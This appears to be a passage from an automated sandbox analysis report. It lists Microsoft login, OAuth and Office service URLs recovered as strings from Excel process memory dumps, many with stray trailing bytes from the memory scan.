    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech3
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://lifecycle.office.com
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.comt
    Source: EXCEL.EXE, 00000001.00000003.739543319.0000000013205000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.600803357.0000000013204000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.735160892.0000000013204000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.752120071.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.597602181.0000000013204000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738731303.0000000013204000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.612834324.0000000013204000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.561469211.0000000013204000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.613268166.0000000013204000.00000004.00000001.sdmpString found in binary or memory: https://login.live.comts
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize(
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://login.windows.local
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes-
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&A
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)A4nA
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5E0j
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7C2hc
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8A
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize9
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize9B$iQ
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeDE#j
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeFC%hb
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeHBWiP
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeICTha
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeKAVn?
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeL
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeLN
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeM
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeWERj
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeXCGh
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZAIn
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize_
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize_NJm
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefEEj
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizehDwkp
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeiEtj
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizeJ
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizejByiN
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizekCvh_
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizem
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemAxn=
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenN
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeoOzl
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeqNlm
